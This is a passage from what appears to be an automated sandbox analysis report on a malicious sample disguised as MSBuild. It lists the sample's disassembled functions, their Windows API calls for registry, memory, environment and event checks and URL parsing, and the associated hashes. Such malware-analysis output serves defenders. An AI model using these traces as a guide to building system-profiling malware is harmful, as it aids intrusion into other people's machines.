                                                                                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E2E4B0,?,00427854,?,00000000,0042738B), ref: 00418526
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418531
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001B58), ref: 0041853C
                                                                                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418552
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041856C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041857A
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00418582
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3108587868-0
                                                                                                                                                                                                                                                                            • Opcode ID: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                                                            • Instruction ID: 55b900fef8fb81f1d8c87853b9dcba1fdba1e1d9fc668c1e9ac9258d03b45c33
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A214F319001046ADB10F7F1ED56FEE7769AF15749F50017EB602B20E2EF782A44C6A9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00404430 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                                                                                            • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                                                            • Opcode ID: 373b4779b2ebc8742b969e618a81eedf206de4bf232f78d02da3801961b718bb
                                                                                                                                                                                                                                                                            • Instruction ID: b34fd57166b640466ff53f1d7e025f9f2fa8d164da18c3b6a8d9ee5040319ab5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 373b4779b2ebc8742b969e618a81eedf206de4bf232f78d02da3801961b718bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A2190B1900308ABDB10DFA4D845BDE7BB8FB05724F10022AFA14A72C1DB785A45CB94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410EE0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: RegOpenKeyExA.KERNEL32(80000002,00E306A0,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: RegCloseKey.ADVAPI32(?), ref: 004101FF
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00E306A0,00000000,00020119,00000000), ref: 00410F31
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00E39BB0,00000000,00000000,00000000,000000FF), ref: 00410F4C
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00410F56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                            • String ID: Windows 11
                                                                                                                                                                                                                                                                            • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                                                                            • Opcode ID: 0f9789e40b6d6ed32b60a0afe372fa190980043e604808c8cf1738d179f2d46f
                                                                                                                                                                                                                                                                            • Instruction ID: 1edb6a64258ba8bc4fb645b0016c63393baf42ba23ff777e5691d4b5187ede9d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f9789e40b6d6ed32b60a0afe372fa190980043e604808c8cf1738d179f2d46f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3012678600219FBE720DBE0EC4AFAA777DEB05701F004265FF08D3240D6B4994087A0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004101A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00E306A0,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004101FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                            • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                                                                            • Opcode ID: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                                                            • Instruction ID: 19236cbb0df9c8bc93342aa8950c0f55e3fb02da4f2605f2dcdb39d085d0879d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF062B9941224FBE710DBE0EC4AFAB7B7DEB09B01F001155FB0596281E6B46A4487B5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410680 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                            • String ID: %d MB$@
                                                                                                                                                                                                                                                                            • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                                            • Opcode ID: 5dfca5893529c656c4b4a9b4f8761da4c616214f26f1a97dcc2b1de84db4f8d6
                                                                                                                                                                                                                                                                            • Instruction ID: aacdcdf272e837d99f9e88c087b3e125dfef2ba064554339201941a4c0c98342
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dfca5893529c656c4b4a9b4f8761da4c616214f26f1a97dcc2b1de84db4f8d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AF09671A50228ABE7049BE4DD0AFBE776DEB05701F400119FB06E3280D7B49C5187A9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00416F40 Relevance: 9.1, APIs: 6, Instructions: 145registrystringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00416F81
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00E39038,00000000,00020119,00422A38), ref: 00416FA0
                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00422A38,00E39E08,00000000,00000000,?,000000FF), ref: 00416FC4
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00422A38), ref: 00416FCE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416FF3
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E39EB0), ref: 00417007
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2623679115-0
                                                                                                                                                                                                                                                                            • Opcode ID: b9a42026017fe1b196d51f3e1b49c43ac35cad1c0513a4a5315a948c45c18dfa
                                                                                                                                                                                                                                                                            • Instruction ID: 2fe2cc2e18d61e3bc662a6b05acd439ca1ae1e36ea9499698c855c9158df25bc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a42026017fe1b196d51f3e1b49c43ac35cad1c0513a4a5315a948c45c18dfa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC51E5B0940208ABCB14EFA4CC46FDE7779EB48704F00826DFA1567281EB74A749CBE5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00406E80 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                            • Opcode ID: caa0b5450c5094a5baae45dd89f1c39122fbd366014749046abec390aabaa39d
                                                                                                                                                                                                                                                                            • Instruction ID: c4e30b9aeb20b9eebc150f857a21994ff691bd194d11d8d74cc69b1be826a0c7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: caa0b5450c5094a5baae45dd89f1c39122fbd366014749046abec390aabaa39d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A217C71A0121AAFDB10DFA4EC84FAB7B79EB45754F10023AF912A72C0D7389D11CBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00407280 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 119libraryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00E39770,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,00420210,000000FF,?,0040BCD3,00E38D30), ref: 004072B1
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(00E39770,00000000,00000000,?,0040BCD3,TjB,00426A54,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426A4F,?,?,?,00000000,00420210,000000FF), ref: 0040732E
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E393B8,?,?,?,00000000,00420210,000000FF,?,0040BCD3), ref: 00407346
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • TjB, xrefs: 004072DA, 00407312, 004072DD
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004072A6, 004072C4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$TjB
                                                                                                                                                                                                                                                                            • API String ID: 2929475105-3266114336
                                                                                                                                                                                                                                                                            • Opcode ID: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                            • Instruction ID: ef5f06d785e981839736ef054ac1c91612f0bbff260fa06a83a8b7e256dd51d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17416E70900615EFC720EFA4ED45EAA7BBAEB48B00F10553EF501A32E1DB786945CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004153E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
